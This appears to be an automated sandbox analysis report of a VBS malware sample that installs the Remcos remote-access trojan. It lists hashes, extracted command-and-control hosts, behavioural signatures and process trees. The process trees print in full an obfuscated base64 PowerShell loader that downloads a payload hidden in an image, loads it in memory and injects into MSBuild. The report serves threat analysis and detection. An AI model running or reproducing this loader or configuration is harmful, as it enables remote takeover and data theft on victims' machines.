Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2024 15:31
Static task
static1
Behavioral task
behavioral1
Sample
Aktarmapdf.vbs
Resource
win7-20240903-en
General
-
Target
Aktarmapdf.vbs
-
Size
150KB
-
MD5
8c5cf018a9128cb2a9267ee3c4183a0c
-
SHA1
c0e11113ae0360e55302ceecbc7a356ed732ca18
-
SHA256
d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e
-
SHA512
7a826b11dc1fb0ca727ac5044a620b3db4108994bb4cdd353abfa6abdb9e598523d560a191fb1e42473c803a628f7052914d1c9124f09bbfe5fcdbf6154e5ada
-
SSDEEP
3072:NqHoOtSIAMD8oV8luoi9TKq/do5DvqHoOtSIAMD8oV8luoi9TKq/do50qHoOtSI2:NqpTD8LRiJKq/e57qpTD8LRiJKq/e50x
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Extracted
remcos
NEW
rem.pushswroller.eu:23101
firewarzone.ydns.eu:23101
sun.drillmmcsnk.eu:23101
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmcghghyrtssxr-7RL1P2
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 8 1932 powershell.exe 19 1932 powershell.exe 151 1656 powershell.exe 166 1656 powershell.exe 278 1292 powershell.exe 293 1292 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe -
pid Process 1932 powershell.exe 1656 powershell.exe 1292 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1932 set thread context of 5060 1932 powershell.exe 86 PID 1656 set thread context of 4332 1656 powershell.exe 100 PID 1292 set thread context of 1992 1292 powershell.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1932 powershell.exe 1932 powershell.exe 1656 powershell.exe 1656 powershell.exe 1656 powershell.exe 1656 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5060 MSBuild.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 3356 wrote to memory of 1932 3356 WScript.exe 82 PID 3356 wrote to memory of 1932 3356 WScript.exe 82 PID 1932 wrote to memory of 2564 1932 powershell.exe 84 PID 1932 wrote to memory of 2564 1932 powershell.exe 84 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 1932 wrote to memory of 5060 1932 powershell.exe 86 PID 4328 wrote to memory of 1656 4328 wscript.exe 97 PID 4328 wrote to memory of 1656 4328 wscript.exe 97 PID 1656 wrote to memory of 4352 1656 powershell.exe 99 PID 1656 wrote to memory of 4352 1656 powershell.exe 99 PID 1656 wrote to memory of 4352 1656 powershell.exe 99 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1656 wrote to memory of 4332 1656 powershell.exe 100 PID 1600 wrote to memory of 1292 1600 wscript.exe 102 PID 1600 wrote to memory of 1292 1600 wscript.exe 102 PID 1292 wrote to memory of 1076 1292 powershell.exe 104 PID 1292 wrote to memory of 1076 1292 powershell.exe 104 PID 1292 wrote to memory of 1076 1292 powershell.exe 104 PID 1292 wrote to memory of 3476 1292 powershell.exe 105 PID 1292 wrote to memory of 3476 1292 powershell.exe 105 PID 1292 wrote to memory of 3476 1292 powershell.exe 105 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 PID 1292 wrote to memory of 1992 1292 powershell.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aktarmapdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"3⤵PID:2564
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5060
-
-
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\classers.vbs1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:4352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:4332
-
-
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\classers.vbs1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1076
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3476
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1992
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
150KB
MD58c5cf018a9128cb2a9267ee3c4183a0c
SHA1c0e11113ae0360e55302ceecbc7a356ed732ca18
SHA256d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e
SHA5127a826b11dc1fb0ca727ac5044a620b3db4108994bb4cdd353abfa6abdb9e598523d560a191fb1e42473c803a628f7052914d1c9124f09bbfe5fcdbf6154e5ada
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD529a75ae243495cccfaed6373fdb72b1c
SHA1db7a5e6aae757862ef6d0bd0767be55a0cc3ad08
SHA2568be3c8af4d1cf093c50a0b69b0b7fefa75e908a6ae301c093120dd50b8fb57e5
SHA5128828f092493c2453dc42985ca6583877d0f79089b7b825141f9cd18d5da01e078cf716204f7b7929fafdef1b38c4a8cebf6b759ffc7eb59647b4490b274259ef
-
Filesize
1KB
MD5742a5cc0c61d65d5928e017c76945a24
SHA12b8c094ff5a7d05d06cd9f78f3ce78ad28b872fc
SHA256542ea8dff47e395e80ed9889be11b902dcc1f8668dbfecf0ea96b753a6c7e30a
SHA512866149caab4d111df13ae7ea5c22c26615b3633925f1d94f2f636e28e12ab273273f7accbe865f561cc1e9943da176c0565e3f65420b82bfaa444867200ae030
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82